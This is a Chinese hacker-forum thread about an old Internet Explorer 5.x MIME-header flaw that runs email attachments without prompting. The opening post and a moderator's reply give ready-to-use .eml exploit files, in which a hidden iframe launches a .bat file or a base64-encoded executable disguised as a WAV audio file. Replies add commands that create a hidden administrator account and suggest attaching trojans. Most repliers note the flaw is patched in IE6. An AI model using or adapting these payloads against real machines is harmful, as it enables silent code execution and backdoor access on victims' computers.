20CN网络安全小组论坛 - 黑客进阶

论坛: 黑客进阶标题: 浏览器MIME头漏洞

作者: sadboy [chiruwn]

论坛用户

浏览器MIME头漏洞
IE 5.0/5.01/5.5
原理：
一般情况下如果附件是文本，IE会读它，如果是VIDEOCL IP,IE会查看，如果是图形，IE就会显示它，但如果是一个exe文件，IE就会提示用户是否执行，但是具有危害的是，当攻击者更改MIME类型之后，IE就会不经过提示用户而直接执行。

具体攻击方法：
//把以下程序编辑为hello.eml文件，然后放在网站上用浏览器打开
From:"xxxxxx"
Subject:mail 0
Date:Thu,2 Nov 2000 13.27.33 +0100
MIME-Version:1.0
Content-Type:multipart/related;
type="multipart/alternative;
boundary="1"
X-priority:3
X-MSMail-Priority:Normal
X-Unsent:1

--1
Content-Type:multipart/alternative;
boundary="2"

--2
Content-Type:text/html;
charset="iso-8859-1"
Content-Transfer-Encoding:quoted-printable
<HTML>
<HEAD>
<BODY bgcolor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
HELLO MY FRIEND!!!!<BR>
</BODY>
</HTML>

--2--

--1
Content-Type:audio/x-wav;
name="hello.bat"
Content-Transfer-Encoding:quoted-printable
Content-ID:<THE-CID>

echo OFF
dir *.*

--1

地主发表时间: 01/07 15:34

回复: quake [quake]

论坛用户

测试失败，什么都没发生！

B1层发表时间: 01/07 16:23

回复: sadboy [chiruwn]

论坛用户

忘了告诉你，要在9x系统下才有用，如果是2000系统，还要加：
net user someone 123456/add
net localgroup administrators someone/add

B2层发表时间: 01/08 15:03

回复: tabris17 [tabris17]

论坛用户

失败很正常
该漏洞对打过补丁的IE或IE6.0无效

B3层发表时间: 01/08 20:55

回复: xuchen0819 [xuchen0819]

论坛用户

那就是技术太老了！呵呵！

B4层发表时间: 01/10 17:03

回复: BlueSnoopy [bluesnoopy]

论坛用户

ie6.0上已经没用

B5层发表时间: 01/14 12:32

回复: SANKKING [sankking]

论坛用户

附：如果你想让对方运行一些你自己的EXE程序，木马之类的东西，那么必须把该程序先换成64base编码制，再贴到后面~~ 接着……

B6层发表时间: 03/07 13:33

回复: aoming [aoming]

版主

huhu，真佩服你的耐心啊，居然把阎雪写的这么多文字打了出来，呵呵
你给的例子只是运行一个DOS下的dir而已，可能还不能说攻击吧？

[此贴被咖啡╃泡面(aoming) 在 03月10日21时01分编辑过]

B7层发表时间: 2003-03-10 21:13:01

回复: aoming [aoming]

版主

我来给个相对完整的算了,今天自攻了一下.huhu

代码:

From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
	type="multipart/alternative";
	boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--1
Content-Type: multipart/alternative;
	boundary="2"

--2
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
ok<BR>
</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
      name="aa.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAIAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu
MzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQ
RQAATAEKAMwneT4AAAAAAAAAAOAADgELAQUAAPAFAACQAAAAAAAAAaAHAAAQAAAAAAYAAABAAAAQ
AAAAAgAABAAAAAAAAAAEAAAAAAAAAADQBwAABgAAAAAAAAIAAAAAABAAACAAAAAAEAAAEAAAAAAA
ABAAAAAA4AYAtQAAAKyvBwA0AQAAAPAGAAA2AAAAAAAAAAAAAAAAAAAAAAAAVK8HAAgAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAA8rwcAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAQAC50ZXh0AAAAAPAFAAAQAAAAggIAAAYAAAAAAAAAAAAAAAAAAEAA
AMAuZGF0YQAAAACQAAAAAAYAABgAAACIAgAAAAAAAAAAAAAAAABAAADALnRscwAAAAAAEAAAAJAG
.........省略若干...............
7u4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////////////////////
//8AH///AB///wAf//8AH/8AAB//AAAfAAAAHwAAAB8AAAABAAAAAQAAAAEAAAABAAAAAQAAAAEA
AAABAAAAAQAAAAEAAAABAAAAAQAAAAEAADwB/wA8Af8APAH/ADwB/wA///8AP////////////wAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

------=_NextPart_000_0009_01C2EECC.16E8F4A0--

[此贴被咖啡╃泡面(aoming) 在 04月01日20时13分编辑过]

B8层发表时间: 04/01 20:26

回复: morziguang [morziguang]

论坛用户

不知道运行了会有什么后果,还有就是怎么转换成64base.

B9层发表时间: 04/01 20:48

论坛: 黑客进阶